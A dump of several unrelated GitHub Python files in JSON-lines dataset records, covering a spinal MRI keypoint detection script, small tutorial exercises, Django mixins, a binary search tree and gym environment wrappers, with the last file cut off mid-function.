Tensor image.\n \"\"\"\n return [self.fit(tensor[0]) for tensor in tensors]\n\n def __repr__(self):\n return self.__class__.__name__ + '(delta_t={0}, kappa={1})'.format(self.delta_t, self.kappa)\n\nclass myTestAdata(Dataset):\n def __init__(self, jsondir, img_dir, transforms=None):\n self.transform = transforms\n self.testImg = pickeT2fromtestdata(jsondir, img_dir)\n self.diffuse2D = diffuse2D()\n # pd.read_csv(img_csvdir,header=None).values\n\n def __getitem__(self, idx):\n imgdir = self.testImg[idx]\n img_arr = dicom2array(imgdir) # get the actual pixel data as a 2D array\n # (height * width)\n origi_shape = np.array(img_arr.shape)\n if img_arr.shape != (256, 256):\n img_aug = cv2.resize(img_arr, (256, 256))\n else:\n img_aug = img_arr\n\n # 'studyUid','seriesUid','instanceUid','zindx'\n tag_list = ['0020|000d', '0020|000e', '0008|0018', '0020|0013']\n studyUid, seriesUid, instanceUid, zindx= dicom_metainfo(imgdir, tag_list)\n\n\n img_aug = self.diffuse2D.fit(img_aug)\n\n if self.transform is not None:\n img_aug = self.transform(img_aug) # 
apply the transform here (convert to tensor, etc.)\n # print(img_aug.shape)\n # print(img_aug)\n return origi_shape, img_aug, instanceUid, seriesUid, studyUid, zindx\n\n def __len__(self):\n return len(self.testImg)\n\ndef resize_pos(x1, y1, src_size, tar_size):\n \"\"\"\n :param x1:\n :param y1:\n :param src_size: width * height\n :param tar_size: width * height\n :return:\n \"\"\"\n w1 = src_size[1]\n h1 = src_size[0]\n w2 = tar_size[0]\n h2 = tar_size[1]\n y1 = np.array(y1).astype(np.float32)\n x1 = np.array(x1).astype(np.float32)\n h1 = np.array(h1).astype(np.float32)\n w1 = np.array(w1).astype(np.float32)\n h2 = np.array(h2).astype(np.float32)\n w2 = np.array(w2).astype(np.float32)\n # print(\"y1:\", y1,\"h1\", h1, \"h2\", h2)\n # print(\"x1\", x1,\"w1\", w1, \"w2\", w2)\n res_h = np.int(np.round(np.float64(y1 / h1 * h2)))\n res_w = np.int(np.round(np.float64(x1 / w1 * w2)))\n # print(x2, y2)\n return res_w, res_h\n\ndef plotPre_GT(img,gt,pred):\n j = 1\n for gtPoint in gt:\n cv2.circle(img, (gtPoint[0], gtPoint[1]), 8, thickness = 2, color=(0, 0, 255))\n cv2.putText(img, str(j), (gtPoint[0] - 10, gtPoint[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n j += 1\n i = 1\n for pre_point in pred:\n cv2.putText(img, str(i), (pre_point[0]+4, pre_point[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 0), 1)\n cv2.rectangle(img, (pre_point[0]-2, pre_point[1]-2), (pre_point[0]+2, pre_point[1]+2), (255, 0, 0), 2)\n i += 1\n plt.imshow(img*255.0)\n plt.show()\n return\n\ndef oneUid(posi_res, type_res, instanceUid_res, seriesUid_res, studyUid_res, zindx):\n onestudent = OrderedDict()\n onestudent[\"studyUid\"] = studyUid_res\n onestudent[\"version\"] = \"v0.1\"\n\n # make the data value\n student_data = OrderedDict()\n student_data[\"seriesUid\"] = seriesUid_res\n student_data[\"instanceUid\"] = instanceUid_res\n\n # make the annotation value\n annotation_data = OrderedDict()\n annotation_data[\"annotator\"] = 72\n\n # make the data value\n data_point = OrderedDict()\n point_data = []\n\n # make the point data\n idx_identification = {0: 'T12-L1', 1: 'L1', 2: 'L1-L2', 3: 'L2', 4: 'L2-L3', 5: 'L3', 6: 'L3-L4', 7: 'L4',\n 8: 'L4-L5', 9: 'L5', 10: 'L5-S1'}\n\n for i in range(len(posi_res)):\n point = OrderedDict()\n point[\"coord\"] = posi_res[i]\n tag = OrderedDict()\n if i in [0, 2, 4, 6, 8, 10]:\n tag['disc'] = type_res[i]\n else:\n tag[\"vertebra\"] = type_res[i]\n tag[\"identification\"] = idx_identification[i]\n point[\"tag\"] = tag\n point[\"zIndex\"] = int(zindx)\n point_data.append(point)\n data_point['point'] = point_data\n annotation_data[\"data\"] = data_point\n student_data[\"annotation\"] = [annotation_data]\n onestudent[\"data\"] = [student_data]\n return onestudent\n\ndef makejson(pred_res_point,pred_res_type, instanceUid, pred_res_seriesUid, pred_res_studyUid, pred_res_zindx):\n sz = len(pred_res_type)\n res = []\n for i in range(sz):\n onestudy = oneUid(pred_res_point[i], pred_res_type[i], instanceUid[i], pred_res_seriesUid[i], pred_res_studyUid[i], pred_res_zindx[i])\n res.append(onestudy)\n json_str = json.dumps(res)\n cur_time_str = time.strftime(\"%Y_%m_%d_H%H_%M_%S\",time.localtime(time.time()))\n print(\"successfully made json file at:\", cur_time_str)\n # filename = \"../data/\" + 'submit_testB_' + cur_time_str + '.json'\n filename = \"result.json\"\n with open(filename, 'w') as json_file:\n json_file.write(json_str)\n return res\n\ndef random_pick(some_list, probabilities):\n \"\"\"\n pick random elements by probabilities\n :param some_list:\n :param probabilities:\n \"\"\"\n x = random.uniform(0, 1)\n 
cumulative_probability = 0.0\n for item, item_probability in zip(some_list, probabilities):\n cumulative_probability += item_probability\n if x < cumulative_probability:\n break\n return item\n\n\ndef corpRectangele(img, point, CropSz):\n \"\"\"\n\n Args:\n img:\n point:\n CropSz: wdith * hight\n\n Returns:\n\n \"\"\"\n cropIMG = []\n for idx in range(len(point)):\n p = point[idx]\n w_corp, h_corp = CropSz\n w_center, h_center = p\n img_sz_h, img_sz_w = img.shape\n # the vert smaller 4 pixel in hight.\n # if idx & 1:\n # h_corp = h_corp-4\n h_start = h_center - h_corp // 2\n h_end = h_center + h_corp // 2\n if h_start <= 0 or h_end >= img_sz_h:\n h_start = 0\n h_end = h_corp\n\n w_start = w_center - w_corp // 2\n w_end = w_center + w_corp // 2\n if w_start < 0 or w_end >= img_sz_w:\n w_start = 0\n w_end = w_corp\n new_img = img[h_start:h_end, w_start:w_end].copy()\n # new_img = new_img[:]\n # print(new_img)\n cropIMG.append(new_img)\n # cv2.rectangle(img,(w_center-w_corp//2,h_center-h_corp//2),(w_center+w_corp//2,h_center+h_corp//2),color=(0,0,255),thickness=2)\n # plt.imshow(255*img)\n # plt.show()\n # for i in range(len(cropIMG)):\n # plt.imshow(cropIMG[i])\n # plt.show()\n # cropIMG = np.array(cropIMG)\n return cropIMG\n\nif __name__ == '__main__':\n # load model from\n\n # net = unet_model.UNet(1, 11)\n # net = unet_model.UNet_twoPart(1, (6, 5))\n net = unet_model.UNet_double()\n vert_net = ResNet(BasicBlock, [2, 2, 2, 2], num_classes=2)\n disc_net = ResNet(BasicBlock, [2, 2, 2, 2], num_classes=5)\n\n\n # vgg_model = VGGNet(requires_grad = True, pretrained=False)\n # net = FCN8s(pretrained_net=vgg_model, n_class=11)\n\n net.float().cuda()\n net.eval()\n vert_net = vert_net.float().cuda()\n vert_net.eval()\n disc_net = disc_net.float().cuda()\n disc_net.eval()\n # torch.distributed.init_process_group(backend='nccl', init_method='tcp://localhost:8000', rank=0, world_size=1)\n # net = nn.parallel.DistributedDataParallel(net.float().cuda())\n if config_test['checkout'] != \"\":\n net.load_state_dict(torch.load(config_test['checkout']))\n vert_net.load_state_dict(torch.load(config_test['vert_checkout']))\n disc_net.load_state_dict(torch.load(config_test['disc_checkout']))\n else:\n print(\"choice the mode file please!\")\n\n testDataset = myTestAdata(config_test['test_jsondir'], config_test['test_img_dir'], transforms=submitTestTransform)\n testDataLoader = DataLoader(testDataset, config_test['batch_size'], False)\n Loader_num = len(testDataLoader)\n all_pred_point = []\n # all res contain: keypoint,type_pred,instanceUid, seriesUid, studyUid\n all_pred_res = []\n all_pred_res_point = []\n all_pred_res_type = []\n all_pred_res_instanceUid = []\n all_pred_res_seriesUid = []\n all_pred_res_studyUid = []\n all_pred_res_zindx = []\n # random_type = ['v1', 'v2', 'v2', 'v2', 'v3', 'v2', 'v4', 'v2', 'v5', 'v2', 'v2']\n # make the type based on probability on statistics info\n typeList_disc = ['v1', 'v2', 'v3', 'v4', 'v5']\n prob_disc = [[30/53, 5/53, 2/53, 1/53, 15/53], [30/53, 5/53, 2/53, 1/53, 15/53], [23/53, 15/53, 8/53, 2/53, 5/53], [7/53, 19/53, 12/53, 2/53, 13/53], [5/53, 18/53, 19/53, 8/53, 3/53], [15/53, 15/53, 17/53, 4/53, 2/53]]\n typeList_vert = ['v1', 'v2']\n prob_vert = [0.1, 0.9]\n idx2vertType = {'0': \"v1\", \"1\": \"v2\"}\n idx2discType = {'0': \"v1\", \"1\": \"v2\", \"2\": \"v3\", \"3\": \"v4\", \"4\": \"v5\"}\n with torch.no_grad():\n for i, (origi_shape, img_aug, instanceUid, seriesUid, studyUid, zindx) in enumerate(testDataLoader):\n print(\"test batch ===== \", i)\n if 
config_test['tranform'] == 0:\n img_aug = img_aug[:, np.newaxis, :, :]\n img_aug = Variable(img_aug).float().cuda()\n # heatmaps_targets = Variable(distance_maps_normalized, requires_grad=True).float().cuda()\n # keyPsoi= Variable(keyPsoi).float().cuda()\n pred_heatmaps = net(img_aug)\n cur_shape = (256, 256)\n pred_points = get_peak_points(pred_heatmaps.cpu().data.numpy()) # (N,15,2)\n batch_id = 0\n project_batch_point = []\n # (width × hieght)\n pred_type = []\n for pred_point_idx in range(len(pred_points)):\n batchPoint = pred_points[pred_point_idx]\n temp_type = []\n project_point_img = []\n # using the .shape to get the (hieght * width)\n orgi_img_shape = (origi_shape[batch_id][1], origi_shape[batch_id][0])\n # orgi_img_shape is (width , hight)\n # make the tensor to ndarray ,and change(c,h,w) to (h,w,c)\n img_original = img_aug[batch_id].cpu().numpy().transpose(1, 2, 0)\n img_fixSz = cv2.resize(img_original, (256, 256))\n img = cv2.resize(img_original, orgi_img_shape)\n # print(\"img shape:\", img_fixSz.shape)\n cropIMG = corpRectangele(img_fixSz, batchPoint, [48, 30])\n for point_idx in range(len(batchPoint)):\n point = batchPoint[point_idx]\n # point[0] is width\n point_newWidth, point_newHight = resize_pos(point[0], point[1], cur_shape, orgi_img_shape)\n project_point_img.append([point_newWidth, point_newHight])\n corpImg_input = cropIMG[point_idx]\n if config_test['showFlag'] == 1:\n plt.imshow(corpImg_input * 255.0)\n plt.show()\n corpImg_input = corpImg_input[np.newaxis,np.newaxis,:,:]\n corpImg_input = torch.Tensor(corpImg_input).float().cuda()\n # print(\"corpImg_inputsahpe:\", corpImg_input.shape)\n if point_idx&1:\n pred_vertType = vert_net(corpImg_input)[0]\n pred_vertType_idx = torch.argmax(pred_vertType, dim=0).cpu().numpy()\n # print(\"pred_vertType:\", pred_vertType_idx)\n temp_type.append(idx2vertType[str(pred_vertType_idx)])\n else:\n pred_discType = disc_net(corpImg_input)[0]\n pred_discType_idx = torch.argmax(pred_discType, dim=0).cpu().numpy()\n # print(\"pred_discType:\", pred_discType)\n temp_type.append(idx2discType[str(pred_discType_idx)])\n\n pred_type.append(temp_type)\n # print(pred_type)\n project_batch_point.append(project_point_img)\n batch_id += 1\n if config_test['showFlag'] == 1:\n plotPre_GT(255*img, [], project_point_img)\n\n all_pred_res_point.extend(project_batch_point)\n all_pred_res_type.extend(pred_type)\n all_pred_res_instanceUid.extend(instanceUid)\n all_pred_res_seriesUid.extend(seriesUid)\n all_pred_res_studyUid.extend(studyUid)\n all_pred_res_zindx.extend(zindx)\n if config_test['showFlag'] == 1:\n print(\"pred point:\", project_batch_point)\n all_pred_point.extend(project_batch_point)\n makejson(all_pred_res_point, all_pred_res_type, all_pred_res_instanceUid, all_pred_res_seriesUid, all_pred_res_studyUid, all_pred_res_zindx)\n\n","repo_name":"SkySailing/tianchi_spinalAI_detection_competetion","sub_path":"testA_submit.py","file_name":"testA_submit.py","file_ext":"py","file_size_in_byte":18235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
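The random_pick helper above draws from a discrete distribution by walking the cumulative probabilities until a uniform sample falls below the running total. A standalone restatement of the same pattern with a quick frequency check (the v1/v2 labels are just sample data):

import random
from collections import Counter

def random_pick(some_list, probabilities):
    # pick one item; each item's chance is its probability weight
    x = random.uniform(0, 1)
    cumulative_probability = 0.0
    for item, item_probability in zip(some_list, probabilities):
        cumulative_probability += item_probability
        if x < cumulative_probability:
            break
    return item

draws = Counter(random_pick(['v1', 'v2'], [0.1, 0.9]) for _ in range(10000))
print(draws)  # roughly 1000 x 'v1' and 9000 x 'v2'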
+{"seq_id":"18695209166","text":"#coding=utf-8\r\n\r\nclass Countlist:\r\n def __init__(self,*args):#可变数量\r\n self.values=[x for x in args] #列表推导式\r\n self.count={}.fromkeys(range(len(self.values)),0) #初始化字典\r\n\r\n def __len__(self):\r\n return len(self.value)\r\n def __getitem__(self, item):\r\n self.count[item] +=1\r\n return self.values[item]\r\n\r\nc1=Countlist(1,2,2,4,7,89)\r\nc2=Countlist(98,5,6,7,78)\r\nc1[1]\r\nc2[1]\r\nc1[1]+c2[2]\r\nprint(c1.count)\r\n\r\n\r\n","repo_name":"Evandy9/eva","sub_path":"xjy047_定制序列.py","file_name":"xjy047_定制序列.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"35201815814","text":"import subprocess\nimport time\n\"\"\"\ntime.sleep(15)\ncmd = \"python log_test2.py\"\nexec = subprocess.Popen(cmd, stdout=subprocess.PIPE)\nexec.wait()\nprint(\"done\")\nfor line in exec.stdout:\n print(line.decode('utf-8').strip())\n print(line)\n\ntime.sleep(15)\n\"\"\"\n\nimport subprocess\n\np1 = subprocess.Popen('dir', shell=True, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\np2 = subprocess.Popen('sort /R', shell=True, stdin=p1.stdout, stdout = subprocess.PIPE)\n\np1.stdout.close()\nout, err = p2.communicate()\nprint(\"out\", out)\nfor i in out:\n print(i.decode(\"utf-8\"))","repo_name":"bopopescu/Py_projects","sub_path":"Py_op/Mul_process/concur_log/log_test1.py","file_name":"log_test1.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41510694495","text":"import os\nimport shutil\nimport numpy as np\nimport argparse\nfrom subprocess import Popen\nfrom time import time, sleep\n\n\ndef get_args():\n parser = argparse.ArgumentParser('Extract or Sample Point Clouds', add_help=False)\n parser.add_argument('--dataset', default='matterport3d')\n parser.add_argument('--mode', default='train', help='train | val | test')\n parser.add_argument('--accepted_cats_path', default='../../data/{}/accepted_cats.json')\n parser.add_argument('--metadata_path', default='../../data/{}/metadata.csv')\n parser.add_argument('--pc_dir', default='../../data/{}/pc_region_crops')\n parser.add_argument('--cp_dir', default='../../results/{}/LearningBased/')\n parser.add_argument('--results_folder_name', default='3D_DINO_full')\n parser.add_argument('--features_dir_name', default='features', type=str)\n parser.add_argument('--classifier_type', default='DINO', help='supervised | DINO')\n parser.add_argument('--pretrained_weights_name', default='checkpoint0200.pth', type=str,\n help=\"Name of the pretrained model.\")\n parser.add_argument('--max_coord', default=3.65, type=float, help='3.65 for MP3D')\n parser.add_argument('--theta', default=0, type=int)\n\n return parser\n\n\ndef timeit(process, process_name, sleep_time=5):\n t0 = time()\n while process.poll() is None:\n print('{} ...'.format(process_name))\n sleep(sleep_time)\n duration = (time() - t0) / 60\n print('{} Took {} minutes'.format(process_name, np.round(duration, 2)))\n\n\ndef main():\n # get the arguments\n parser = argparse.ArgumentParser('Extract or Sample Point Clouds', parents=[get_args()])\n args = parser.parse_args()\n\n crop_folders = [e for e in os.listdir(args.pc_dir.format(args.dataset)) if 'crop' in e]\n crop_folders = sorted(crop_folders, key=lambda x: int(x.split('_')[-1]))\n for i, crop_folder in enumerate(crop_folders):\n pc_dir = os.path.join(args.pc_dir, crop_folder)\n # render the results in parallel\n command = 'python -m torch.distributed.launch --nproc_per_node=1 extract_point_transformer_features_v2.py ' \\\n '--dataset {dataset} --mode {mode} --accepted_cats_path {accepted_cats_path} ' \\\n '--metadata_path {metadata_path} --pc_dir {pc_dir} --features_dir_name {features_dir_name} ' \\\n '--classifier_type {classifier_type} --results_folder_name {results_folder_name} ' \\\n '--pretrained_weights_name {pretrained_weights_name} --max_coord {max_coord} --theta {theta}'\n command = command.format(dataset=args.dataset,\n mode=args.mode,\n accepted_cats_path=args.accepted_cats_path,\n metadata_path=args.metadata_path,\n pc_dir=pc_dir,\n features_dir_name=args.features_dir_name + '_{}'.format(i+1),\n classifier_type=args.classifier_type,\n results_folder_name=args.results_folder_name,\n pretrained_weights_name=args.pretrained_weights_name,\n max_coord=args.max_coord,\n theta=args.theta)\n\n process_sampling = Popen(command, shell=True)\n timeit(process_sampling, 'Encoding crops', sleep_time=60)\n\n # move the features to the crop region directory.\n features_dirs = [args.features_dir_name + '_{}'.format(i+1) for i in range(len(crop_folders))]\n for features_dir in features_dirs:\n src = os.path.join(args.cp_dir.format(args.dataset), args.results_folder_name, features_dir)\n dest = os.path.join(args.pc_dir.format(args.dataset), features_dir)\n shutil.move(src, dest)\n\n\nif __name__ == '__main__':\n 
main()\n\n\n\n","repo_name":"reza-asad/3DSSR","sub_path":"models/LearningBased/extract_point_transformer_features_wrapper.py","file_name":"extract_point_transformer_features_wrapper.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15729379335","text":"d = []\n\nfor i in range(19):\n d.append(list(map(int,input().split()))) # 배열입력 만들기\\\n\nn = int(input())\nfor j in range(n):\n x, y = map(int,input().split())\n for k in range(19):\n if d[k][y-1] == 1:\n d[k][y-1] = 0\n else:\n d[k][y-1] = 1\n\n if d[x-1][k] == 1:\n d[x-1][k] = 0\n else:\n d[x-1][k] = 1\n\nfor m in d:\n p = list(map(str,m))\n q = ' '.join(p)\n print(q)","repo_name":"Yoonsik-Shin/TIL","sub_path":"Algorism/Codeup/문제풀이/6096.py","file_name":"6096.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"33581225399","text":"# pylint: disable=C0111\n\"\"\"\nMixin classes for views\n\"\"\"\nfrom django.urls import reverse\nfrom django.http import HttpResponseForbidden\n\n\nclass AdminLinksMixin:\n \"\"\"\n Adds links to the admin page for an object to the context.\n\n Meant to be used together with DetailView.\n \"\"\"\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n # pylint: disable=protected-access\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n context[\"change_url\"] = reverse(f\"admin:{app_label}_{model_name}_change\",\n args=[self.object.id])\n context[\"delete_url\"] = reverse(f\"admin:{app_label}_{model_name}_delete\",\n args=[self.object.id])\n return context\n\n\nclass ViewAddMixin:\n \"\"\"\n Adds one view to the object each time the object is dispatched\n \"\"\"\n\n def get_context_data(self, **kwargs):\n self.object.add_view()\n return super().get_context_data(**kwargs)\n\n\nclass PublishedMixin:\n \"\"\"\n Fails to load unpublished objects.\n \"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n user = request.user\n # pylint: disable=protected-access\n app_label = self.model._meta.app_label\n model_name = self.model._meta.model_name\n perm = f\"{app_label}.change_{model_name}\"\n if self.get_object().is_published or user.has_perm(perm):\n return super().dispatch(request, *args, **kwargs)\n\n return HttpResponseForbidden(\"Ikke publisert\")\n\n\ndef update_published_state(model):\n \"\"\"\n Update the object with the new date.\n :param model: The model class to update\n \"\"\"\n for m in model.objects.filter(published=False).iterator():\n if m.is_published:\n m.save()\n\n\nclass PublishedListMixin:\n \"\"\"\n Excludes unpublished objects from the queryset.\n \"\"\"\n\n def get_queryset(self):\n update_published_state(self.model)\n queryset = super().get_queryset()\n return queryset.exclude(published=False)\n","repo_name":"Nabla-NTNU/content-app","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28306493081","text":"# 和list比较,dict有以下几个特点:\n# 查找和插入的速度极快,不会随着key的增加而变慢;\n# 需要占用大量的内存,内存浪费多。\n# 而list相反:\n# 查找和插入的时间随着元素的增加而增加;\n# 占用空间小,浪费内存很少。\n# 所以,dict是用空间来换取时间的一种方法。\n\n\nd = {\"Michael\": \"95\", \"Bob\": 75, \"Tracy\": 85}\nprint(d[\"Michael\"])\n\nif \"Job\" in d:\n print(\"Job key is exists\")\nelse:\n print(\"Job key is not exists\")\n\n# 如果key不存在,返回None\nif d.get(\"Job\", -1) != -1:\n print(\"Job key is exists\")\nelse:\n print(\"Job key is not exists\")\n\n# pop对应的key\nprint(d.pop(\"Bob\"))\n\ns = set([1, 2, 3])\ns.add(4)\ns.add(4)\ns.add(5)\ns.add(3)\n\ns1 = s & set([1, 2, 8,6])\nprint(\"s items \")\nfor s_ in s:\n print(s_)\nprint(\"s1 items \")\nfor s_ in s1:\n print(s_)\n\ns_1 = set([1, 2, 3])\n# set 不可变\n# error\n# s_2 = set(1, [2, 3])\n\nfor s_ in s_1:\n print(s_)\n# for s_ in s_2:\n# print(s_)\n# dict的value 可变,key不可变\ns_3 = {\"Michael\": (1, 2, 3)}\n# error\n# s_4 = {(1, [2, 3]): \"Michael\"}\ns_4 = {\"Michael\": (1, [2, 3])}\n\nfor s_ in s_3:\n print(s_3.get(s_))\nfor s_ in s_4:\n print(s_4.get(s_))\n\ndict = {}\ndict['one'] = \"1 - 菜鸟教程\"\ndict[2] = \"2 - 菜鸟工具\"\n\ntinydict = {'name': 'runoob', 'code': 1, 'site': 'www.runoob.com'}\n\nprint(dict['one']) # 输出键为 'one' 的值\nprint(dict[2]) # 输出键为 2 的值\nprint(tinydict) # 输出完整的字典\nprint(tinydict.keys()) # 输出所有键\nprint(tinydict.values()) # 输出所有值\nprint(oct(18));\n\n# 字典是支持无限极嵌套的\n\ncities={\n '北京':{\n '朝阳':['国贸','CBD','天阶','我爱我家','链接地产'],\n '海淀':['圆明园','苏州街','中关村','北京大学'],\n '昌平':['沙河','南口','小汤山',],\n '怀柔':['桃花','梅花','大山'],\n '密云':['密云A','密云B','密云C']\n },\n '河北':{\n '石家庄':['石家庄A','石家庄B','石家庄C','石家庄D','石家庄E'],\n '张家口':['张家口A','张家口B','张家口C'],\n '承德':['承德A','承德B','承德C','承德D']\n }\n}\n\nfor i in cities['北京']:\n print(i)\n\n\nfor i in cities['北京']['海淀']:\n print(i)","repo_name":"Melo15Zhang/python","sub_path":"4-3/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74712164464","text":"#Adam Burford\n#COP4533\n#Section 3594\n\nclass BinarySearchTree:\n \"\"\"Binary Search Tree class from:\n Problem Solving with Algorithms and Data Structures using Python\n By Brad Miller and David Ranum, Luther College\n --Minor refactoring by Adam Burford\n --Also removed key from nodes, now operates only on values\"\"\"\n\n def __init__(self):\n self.root = None\n self.size = 0\n\n def length(self):\n return self.size\n\n def __len__(self):\n return self.size\n\n def put(self, value):\n if self.root:\n self._put(value, self.root)\n else:\n self.root = TreeNode(value)\n self.size = self.size + 1\n\n def _put(self, value, current_node):\n if value < current_node.value:\n if current_node.hasLeftChild():\n self._put(value, current_node.left_child)\n else:\n current_node.left_child = TreeNode(value, parent = current_node)\n else:\n if current_node.hasRightChild():\n self._put(value, current_node.right_child)\n else:\n current_node.right_child = TreeNode(value,parent=current_node)\n\n\n\n def get(self, value):\n if self.root:\n match = self._get(value, self.root)\n if match:\n return match.value\n else:\n return None\n else:\n return None\n\n def _get(self, value, current_node):\n\n if not current_node:\n return None\n elif current_node.value == value:\n return current_node\n elif value < current_node.value:\n return self._get(value, current_node.left_child)\n else:\n return self._get(value, current_node.right_child)\n\n def __getitem__(self, value):\n return self.get(value)\n\n def __setitem__(self, k, v):\n self.put(k, v)\n\n def __contains__(self, key):\n return self._get(key, self.root) != None\n\n def delete(self, value):\n if self.size > 1:\n nodeToRemove = self._get(value, self.root)\n if nodeToRemove:\n self.remove(nodeToRemove)\n self.size = self.size-1\n else:\n raise KeyError('Error, key not in tree')\n elif self.size == 1 and self.root.value == value:\n self.root = None\n self.size = self.size - 1\n else:\n raise KeyError('Error, key not in tree')\n\n def __delitem__(self,key):\n self.delete(key)\n\n def remove(self, currentNode):\n if currentNode.isLeaf():\n if currentNode == currentNode.parent.left_child:\n currentNode.parent.left_child = None\n else:\n currentNode.parent.right_child = None\n elif currentNode.hasBothChildren():\n succ = currentNode.findSuccessor()\n succ.spliceOut()\n currentNode.value = succ.value\n\n else:\n if currentNode.hasLeftChild():\n if currentNode.isLeftChild():\n currentNode.left_child.parent = currentNode.parent\n currentNode.parent.left_child = currentNode.left_child\n elif currentNode.isRightChild():\n currentNode.left_child.parent = currentNode.parent\n currentNode.parent.right_child = currentNode.left_child\n else:\n currentNode.replaceNodeData(currentNode.left_child.value,\n currentNode.left_child.left_child,\n currentNode.left_child.right_child)\n else:\n if currentNode.isLeftChild():\n currentNode.right_child.parent = currentNode.parent\n currentNode.parent.left_child = currentNode.right_child\n elif currentNode.isRightChild():\n currentNode.right_child.parent = currentNode.parent\n currentNode.parent.right_child = currentNode.right_child\n else:\n currentNode.replaceNodeData(currentNode.right_child.value,\n currentNode.right_child.left_child,\n currentNode.right_child.right_child)\n\nclass TreeNode:\n \"\"\"Binary Search Tree Node class from:\n Problem Solving with Algorithms and Data Structures using Python\n By Brad Miller and David Ranum, Luther College\n --Minor refactoring by Adam Burford\"\"\"\n\n def 
__init__(self, value, left = None, right = None, parent = None):\n self.value = value\n self.left_child = left\n self.right_child = right\n self.parent = parent\n\n def hasLeftChild(self):\n return self.left_child\n\n def hasRightChild(self):\n return self.right_child\n\n def isLeftChild(self):\n return self.parent and self.parent.left_child == self\n\n def isRightChild(self):\n return self.parent and self.parent.right_child == self\n\n def isRoot(self):\n return not self.parent\n\n def isLeaf(self):\n return not (self.right_child or self.left_child)\n\n def hasAnyChildren(self):\n return self.right_child or self.left_child\n\n def hasBothChildren(self):\n return self.right_child and self.left_child\n\n def spliceOut(self):\n\n if self.isLeaf():\n if self.isLeftChild():\n self.parent.left_child = None\n else:\n self.parent.right_child = None\n elif self.hasAnyChildren():\n if self.hasLeftChild():\n if self.isLeftChild():\n self.parent.left_child = self.left_child\n else:\n self.parent.right_child = self.left_child\n self.left_child.parent = self.parent\n else:\n if self.isLeftChild():\n self.parent.left_child = self.right_child\n else:\n self.parent.right_child = self.right_child\n self.right_child.parent = self.parent\n\n def findSuccessor(self):\n succ = None\n if self.hasRightChild():\n succ = self.right_child.findMin()\n else:\n if self.parent:\n if self.isLeftChild():\n succ = self.parent\n else:\n self.parent.right_child = None\n succ = self.parent.findSuccessor()\n self.parent.right_child = self\n return succ\n\n def findMin(self):\n current = self\n while current.hasLeftChild():\n current = current.left_child\n return current\n\n def replaceNodeData(self, value, lc, rc):\n # nodes no longer carry a separate key, so only the value is replaced\n self.value = value\n self.left_child = lc\n self.right_child = rc\n if self.hasLeftChild():\n self.left_child.parent = self\n if self.hasRightChild():\n self.right_child.parent = self\n\n\n","repo_name":"adamburford/COP4533","sub_path":"COP4533/Assignment 3/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":6893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
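A short usage check for the tree above (after the refactor, values double as keys):

bst = BinarySearchTree()
for v in [50, 30, 70, 20, 40]:
    bst.put(v)

print(len(bst))     # 5
print(bst.get(40))  # 40
print(25 in bst)    # False
bst.delete(30)      # node with two children; replaced by its in-order successor
print(bst.get(30))  # None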
+{"seq_id":"6184664768","text":"\"\"\"\nTitle: Large-Scale Study of Curiosity-Driven Learning\nAuthor: Yuri Burda, Harri Edwards, Deepak Pathak, Amos Storkey, Trevor Darrell and Alexei A. Efros\nDate: 2019\nCode version: 12/8/2020\nAvailability: https://github.com/openai/large-scale-curiosity/blob/master/wrappers.py\n\"\"\"\n\nimport itertools\nimport math\nimport queue\nfrom collections import deque\n\nimport retro\nimport gym\nimport gym.spaces\nimport numpy as np\nfrom PIL import Image\n\nclass ProcessFrame(gym.ObservationWrapper):\n def __init__(self, env):\n super(ProcessFrame, self).__init__(env)\n self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)\n\n def observation(self, obs):\n return ProcessFrame.process(obs)\n\n @staticmethod\n def process(frame, crop=True):\n if frame.size == 210 * 160 * 3:\n img = np.reshape(frame, [210, 160, 3]).astype(np.float32)\n elif frame.size == 250 * 160 * 3:\n img = np.reshape(frame, [250, 160, 3]).astype(np.float32)\n elif frame.size == 224 * 240 * 3: # mario resolution\n img = np.reshape(frame, [224, 240, 3]).astype(np.float32)\n else:\n assert False, \"Unknown resolution.\" + str(frame.size)\n img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 + img[:, :, 2] * 0.114\n size = (84, 110 if crop else 84)\n resized_screen = np.array(Image.fromarray(img).resize(size, resample=Image.BILINEAR), dtype=np.uint8)\n x_t = resized_screen[18:102, :] if crop else resized_screen\n x_t = np.reshape(x_t, [84, 84, 1])\n return x_t.astype(np.uint8)\n\n\nclass ImageToPyTorch(gym.ObservationWrapper):\n def __init__(self, env):\n super(ImageToPyTorch, self).__init__(env)\n old_shape = self.observation_space.shape\n self.observation_space = gym.spaces.Box(\n low=0.0,\n high=1.0,\n shape=(old_shape[-1], old_shape[0], old_shape[1]),\n dtype=np.float32)\n\n def observation(self, observation):\n return np.moveaxis(observation, 2, 0)\n\n\nclass ExtraTimeLimit(gym.Wrapper):\n def __init__(self, env, max_episode_steps=10000):\n gym.Wrapper.__init__(self, env)\n self._max_episode_steps = max_episode_steps\n self._elapsed_steps = 0\n\n def step(self, action):\n observation, reward, done, info 